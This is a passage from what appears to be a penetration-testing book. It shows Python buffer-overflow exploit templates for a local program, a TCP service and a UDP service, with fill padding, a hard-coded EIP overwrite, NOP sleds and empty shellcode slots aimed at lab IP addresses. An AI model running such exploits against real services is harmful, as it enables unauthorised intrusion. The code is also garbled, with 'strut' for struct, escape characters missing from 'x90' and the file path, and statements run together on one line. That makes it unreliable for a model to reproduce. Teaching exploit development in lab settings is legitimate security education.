In addition to writing malicious files that can be uploaded into a program, you may have to generate code that interacts with services over a standalone program that accepts arguments, a TCP service, or even a UDP service. Consider the previous program we just exploited, if it was different in nature we could exploit it still, and just the way the scripts interacted with it would be different. The following three examples show what the code would look if it met any of those criteria. Of course, the memory addresses and sizes would have to be adjusted for other programs you may come across.
We can even create Python script to wrap around programs that have arguments passed to them. That way you can build exploits using wrapper scripts, which inject code, as shown following:
import subprocess, strut program_name = 'C:exploit_writingvulnerable.exe' fill ="A"*4112 eip = struct.pack('<I',0x7C874413) offset = "x90"*10 available_shellcode_space = 320 shell =() #Code to insert remaining space exploit = fill + eip + offset + shell subprocess.call([program_name, exploit])
This form of exploit is the rarest you will encounter as it typically would not grant you any additional rights. When creating exploits like these, it is usually to see what additional accesses you may be granted through a whitelisted program verses user level permissions. Keep in mind, this type of exploit is much tougher to write than malicious files, TCP, or UDP services. On the other side of the spectrum, the most common exploit that you will likely write is a TCP service exploit.
Most often, you will come across services that can be exploited over TCP. This means, for analysis, you would have to setup a test box, which had Immunity or some other debugger and the service running. You would have to attach Immunity to that service and test your exploit as you have done previously.
import sys, socket, strut rhost = "192.168.195.159" lhost = "192.168.195.169" rport = 23 fill ="A"*4112 eip = struct.pack('<I',0x7C874413) offset = "x90"*10 shell =() #Code to insert # NOPs to fill the remaining space exploit = fill + eip + offset + shell client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client.sendto(exploit, (rhost, rport))
Had the TFTP service highlighted in Chapter 7, Cracking the Perimeter with Python, been vulnerable to potential buffer overflow attacks, we would have looked at creating an exploit for the UDP service.
Generating Exploits for UDP Services is very much like a TCP service. The only difference is you are working with a different communication protocol.
import sys, socket, strut rhost = "192.168.195.159" lhost = "192.168.195.169" rport = 69 fill ="A"*4112 eip = struct.pack('<I',0x7C874413) offset = "x90"*10 available_shellcode_space = 320 shell =() #Code to insert # NOPs to fill the remaining space exploit = fill + eip + offset + shell client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) client.sendto(exploit, (rhost, rport))
Now that you have seen the basics of the most common types of exploits you may write, let us look at reversing a Metasploit module.